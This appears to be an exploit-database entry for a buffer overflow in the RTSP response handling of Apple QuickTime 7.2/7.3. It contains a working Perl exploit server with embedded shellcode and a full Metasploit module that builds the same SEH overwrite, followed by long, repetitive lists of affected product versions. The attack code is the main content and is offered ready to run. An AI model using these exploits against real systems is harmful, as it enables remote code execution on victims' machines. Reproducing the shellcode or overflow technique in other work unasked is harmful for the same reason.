# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl) # Date: 2009-01-06 # Author: Jacky # Software Link: [downoad link if available] # Version: 7.2/7.3 # Tested on: Windows XP SP3 # CVE : [if exists] # Code : #Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition ) #Discovered by (Krystian Kloskowski (h07) <[email protected]>) #Written and coded by Jacky! #All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-) #This time i wrote the exploit in perl , because i saw that it was written #many times in python and ruby only ! #This exploit is for EDUCATIONAL PURPOSES ONLY !!! #!/usr/bin/perl -w # (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n # # 0x41414141 Pointer to next SEH record # 0x42424242 SE handler use strict; use Socket; my $junk="A"x991; my $nseh="\xeb\x06\x90\x90"; my $seh="\x4e\x28\x86\x66"; #\x4e\x28\x86\x66 my $nops="\x90"x20; my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" . "\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" . "\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" . "\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" . "\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" . "\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" . "\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" . "\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" . "\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" . "\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" . "\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" . "\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" . "\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" . "\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" . "\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" . "\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" . "\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" . "\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" . "\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" . "\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" . "\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" . "\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" . "\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" . "\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" . "\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" . "\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" . "\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" . "\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" . "\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41"; my $rest="B"x(4096-length($seh.$nops.$shellcode)); my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest; my $header = "RTSP/1.0 200 OK\r\n". "CSeq: 1\r\n". "Date: 0x00 :P\r\n". "Content-Base: rtsp://0.0.0.0/1.mp3/\r\n". "Content-Type: $payload\r\n". "Content-Length: 334\r\n". "\r\n"; my $body = "v=0\r\n". "o=- 16689332712 1 IN IP4 0.0.0.0\r\n". "s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n". "i=1.mp3\r\n". "t=0 0\r\n". "a=tool:ciamciaramcia\r\n". "a=type:broadcast\r\n". "a=control:*\r\n". "a=range:npt=0-213.077\r\n". "a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n". "a=x-qt-text-inf:1.mp3\r\n". "m=audio 0 RTP/AVP 14\r\n". "c=IN IP4 0.0.0.0\r\n". "a=control:track1\r\n"; my $evil=$header.$body; my $port=shift || 554; my $proto=getprotobyname('tcp'); socket(SERVER,PF_INET,SOCK_STREAM,$proto); my $paddr=sockaddr_in($port,INADDR_ANY); bind(SERVER,$paddr); listen(SERVER,SOMAXCONN); print "[+]Listening on [RTSP]554\n"; my $client_addr; while($client_addr=accept(CLIENT,SERVER)) { print CLIENT $evil; print "[+]Connection Accepted\n"; print "[+]Sending Evil Payload\n"; } close CLIENT; print "[+]Connection closed\n";

Exploit Database EDB-ID : 16424

Publication date : 2010-05-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: apple_quicktime_rtsp_response.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long RTSP response to a client, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2007-6166' ], [ 'OSVDB', '40876' ], [ 'BID', '26549' ], [ 'URL', 'http://milw0rm.com/exploits/4648' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 700, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", 'MaxNops' => 0, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'QuickTime 7.3, QuickTime Player 7.3', { 'Offset' => 991, 'Ret' => 0x67644297 } ], # pop esi; pop ebx; ret / QuickTimeStreaming.qtx (7.3.0.70) ], 'Privileged' => false, 'DisclosureDate' => 'Nov 23 2007', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ]) ], self.class) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) client.get_once buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2) buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length) strname = rand_text_alpha(rand(75) + 1) date = Time.now num = rand(1).to_s header = "RTSP/1.0 200 OK\r\n" header << "CSeq: 1\r\n" header << "Date: #{date}\r\n" header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n" header << "Content-Type: #{buffer}\r\n" header << "Content-Length: #{strname.length}\r\n\r\n" body = "v=#{num}\r\n" body << "o=#{strname}\r\n" body << "s=#{strname}\r\n" body << "i=#{strname}\r\n" body << "t=#{num}\r\n" body << "a=tool:#{strname}\r\n" body << "a=type:#{strname}\r\n" body << "a=control:#{strname}\r\n" body << "a=range:#{strname}\r\n" body << "a=x-qt-text-nam:#{strname}\r\n" body << "a=x-qt-text-inf:#{strname}\r\n" body << "m=#{strname}\r\n" body << "c=#{strname}\r\n" body << "a=control:#{strname}\r\n" sploit = header + body print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...") client.put(sploit) handler(client) service.close_client(client) end end

Products Mentioned

Configuraton 0

Apple>>Quicktime >> Version To (including) 7.3

Apple>>Quicktime >> Version - (Open CPE detail)
Apple>>Quicktime >> Version 3 (Open CPE detail)
Apple>>Quicktime >> Version 3.0 (Open CPE detail)
Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 5.0 (Open CPE detail)
Apple>>Quicktime >> Version 5.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.5 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.8 (Open CPE detail)
Apple>>Quicktime >> Version 7.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.3 (Open CPE detail)

Apple>>Quicktime >> Version -

Apple>>Quicktime >> Version - (Open CPE detail)

Apple>>Quicktime >> Version 3.0

Apple>>Quicktime >> Version 3.0 (Open CPE detail)

Apple>>Quicktime >> Version 4.1.2

Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)

Apple>>Quicktime >> Version 5.0

Apple>>Quicktime >> Version 5.0 (Open CPE detail)

Apple>>Quicktime >> Version 5.0.1

Apple>>Quicktime >> Version 5.0.1 (Open CPE detail)

Apple>>Quicktime >> Version 5.0.2

Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)

Apple>>Quicktime >> Version 6.0

Apple>>Quicktime >> Version 6.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.0 (Open CPE detail)

Apple>>Quicktime >> Version 6.1

Apple>>Quicktime >> Version 6.1 (Open CPE detail)

Apple>>Quicktime >> Version 6.5

Apple>>Quicktime >> Version 6.5 (Open CPE detail)

Apple>>Quicktime >> Version 6.5.1

Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)

Apple>>Quicktime >> Version 6.5.2

Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)

Apple>>Quicktime >> Version 7.0

Apple>>Quicktime >> Version 7.0 (Open CPE detail)

Apple>>Quicktime >> Version 7.0.1

Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)

Apple>>Quicktime >> Version 7.0.2

Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)

Apple>>Quicktime >> Version 7.0.3

Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)

Apple>>Quicktime >> Version 7.0.4

Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)

Apple>>Quicktime >> Version 7.1

Apple>>Quicktime >> Version 7.1 (Open CPE detail)

Apple>>Quicktime >> Version 7.1.1

Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)

Apple>>Quicktime >> Version 7.1.2

Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)

Apple>>Quicktime >> Version 7.1.3

Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)

Apple>>Quicktime >> Version 7.1.4

Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)

Apple>>Quicktime >> Version 7.1.5

Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)

Apple>>Quicktime >> Version 7.1.6

Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)

Apple>>Quicktime >> Version 7.2

Apple>>Quicktime >> Version 7.2 (Open CPE detail)

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)

Configuraton 0

Apple>>Safari >> Version *

Apple>>Safari >> Version - (Open CPE detail)
Apple>>Safari >> Version 1.0 (Open CPE detail)
Apple>>Safari >> Version 1.0 (Open CPE detail)
Apple>>Safari >> Version 1.0 (Open CPE detail)
Apple>>Safari >> Version 1.0.0 (Open CPE detail)
Apple>>Safari >> Version 1.0.0b1 (Open CPE detail)
Apple>>Safari >> Version 1.0.0b2 (Open CPE detail)
Apple>>Safari >> Version 1.0.1 (Open CPE detail)
Apple>>Safari >> Version 1.0.2 (Open CPE detail)
Apple>>Safari >> Version 1.0.3 (Open CPE detail)
Apple>>Safari >> Version 1.0.3 (Open CPE detail)
Apple>>Safari >> Version 1.0.3 (Open CPE detail)
Apple>>Safari >> Version 1.0b1 (Open CPE detail)
Apple>>Safari >> Version 1.1 (Open CPE detail)
Apple>>Safari >> Version 1.1.0 (Open CPE detail)
Apple>>Safari >> Version 1.1.1 (Open CPE detail)
Apple>>Safari >> Version 1.2 (Open CPE detail)
Apple>>Safari >> Version 1.2.0 (Open CPE detail)
Apple>>Safari >> Version 1.2.1 (Open CPE detail)
Apple>>Safari >> Version 1.2.2 (Open CPE detail)
Apple>>Safari >> Version 1.2.3 (Open CPE detail)
Apple>>Safari >> Version 1.2.4 (Open CPE detail)
Apple>>Safari >> Version 1.2.5 (Open CPE detail)
Apple>>Safari >> Version 1.3 (Open CPE detail)
Apple>>Safari >> Version 1.3.0 (Open CPE detail)
Apple>>Safari >> Version 1.3.1 (Open CPE detail)
Apple>>Safari >> Version 1.3.2 (Open CPE detail)
Apple>>Safari >> Version 1.3.2 (Open CPE detail)
Apple>>Safari >> Version 1.3.2 (Open CPE detail)
Apple>>Safari >> Version 2 (Open CPE detail)
Apple>>Safari >> Version 2.0 (Open CPE detail)
Apple>>Safari >> Version 2.0.0 (Open CPE detail)
Apple>>Safari >> Version 2.0.1 (Open CPE detail)
Apple>>Safari >> Version 2.0.2 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.4 (Open CPE detail)
Apple>>Safari >> Version 2.0.4 (Open CPE detail)
Apple>>Safari >> Version 3 (Open CPE detail)
Apple>>Safari >> Version 3.0 (Open CPE detail)
Apple>>Safari >> Version 3.0.0 (Open CPE detail)
Apple>>Safari >> Version 3.0.0 (Open CPE detail)
Apple>>Safari >> Version 3.0.0b (Open CPE detail)
Apple>>Safari >> Version 3.0.0b (Open CPE detail)
Apple>>Safari >> Version 3.0.1 (Open CPE detail)
Apple>>Safari >> Version 3.0.1 (Open CPE detail)
Apple>>Safari >> Version 3.0.1 (Open CPE detail)
Apple>>Safari >> Version 3.0.1b (Open CPE detail)
Apple>>Safari >> Version 3.0.1b (Open CPE detail)
Apple>>Safari >> Version 3.0.2 (Open CPE detail)
Apple>>Safari >> Version 3.0.2 (Open CPE detail)
Apple>>Safari >> Version 3.0.2b (Open CPE detail)
Apple>>Safari >> Version 3.0.2b (Open CPE detail)
Apple>>Safari >> Version 3.0.3 (Open CPE detail)
Apple>>Safari >> Version 3.0.3 (Open CPE detail)
Apple>>Safari >> Version 3.0.3b (Open CPE detail)
Apple>>Safari >> Version 3.0.3b (Open CPE detail)
Apple>>Safari >> Version 3.0.4 (Open CPE detail)
Apple>>Safari >> Version 3.0.4 (Open CPE detail)
Apple>>Safari >> Version 3.0.4b (Open CPE detail)
Apple>>Safari >> Version 3.0.4b (Open CPE detail)
Apple>>Safari >> Version 3.0.5 (Open CPE detail)
Apple>>Safari >> Version 3.1.0 (Open CPE detail)
Apple>>Safari >> Version 3.1.0 (Open CPE detail)
Apple>>Safari >> Version 3.1.0b (Open CPE detail)
Apple>>Safari >> Version 3.1.0b (Open CPE detail)
Apple>>Safari >> Version 3.1.1 (Open CPE detail)
Apple>>Safari >> Version 3.1.1b (Open CPE detail)
Apple>>Safari >> Version 3.1.2 (Open CPE detail)
Apple>>Safari >> Version 3.1.2b (Open CPE detail)
Apple>>Safari >> Version 3.2.0 (Open CPE detail)
Apple>>Safari >> Version 3.2.0b (Open CPE detail)
Apple>>Safari >> Version 3.2.1 (Open CPE detail)
Apple>>Safari >> Version 3.2.1b (Open CPE detail)
Apple>>Safari >> Version 3.2.2 (Open CPE detail)
Apple>>Safari >> Version 3.2.2b (Open CPE detail)
Apple>>Safari >> Version 4.0 (Open CPE detail)
Apple>>Safari >> Version 4.0 (Open CPE detail)
Apple>>Safari >> Version 4.0.0b (Open CPE detail)
Apple>>Safari >> Version 4.0.1 (Open CPE detail)
Apple>>Safari >> Version 4.0.2 (Open CPE detail)
Apple>>Safari >> Version 4.0.3 (Open CPE detail)
Apple>>Safari >> Version 4.0.4 (Open CPE detail)
Apple>>Safari >> Version 4.0.5 (Open CPE detail)
Apple>>Safari >> Version 4.1 (Open CPE detail)
Apple>>Safari >> Version 4.1.1 (Open CPE detail)
Apple>>Safari >> Version 4.1.2 (Open CPE detail)
Apple>>Safari >> Version 4.1.3 (Open CPE detail)
Apple>>Safari >> Version 5.0 (Open CPE detail)
Apple>>Safari >> Version 5.0.1 (Open CPE detail)
Apple>>Safari >> Version 5.0.2 (Open CPE detail)
Apple>>Safari >> Version 5.0.3 (Open CPE detail)
Apple>>Safari >> Version 5.0.4 (Open CPE detail)
Apple>>Safari >> Version 5.0.5 (Open CPE detail)
Apple>>Safari >> Version 5.0.6 (Open CPE detail)
Apple>>Safari >> Version 5.1 (Open CPE detail)
Apple>>Safari >> Version 5.1.1 (Open CPE detail)
Apple>>Safari >> Version 5.1.2 (Open CPE detail)
Apple>>Safari >> Version 5.1.3 (Open CPE detail)
Apple>>Safari >> Version 5.1.4 (Open CPE detail)
Apple>>Safari >> Version 5.1.5 (Open CPE detail)
Apple>>Safari >> Version 5.1.6 (Open CPE detail)
Apple>>Safari >> Version 5.1.7 (Open CPE detail)
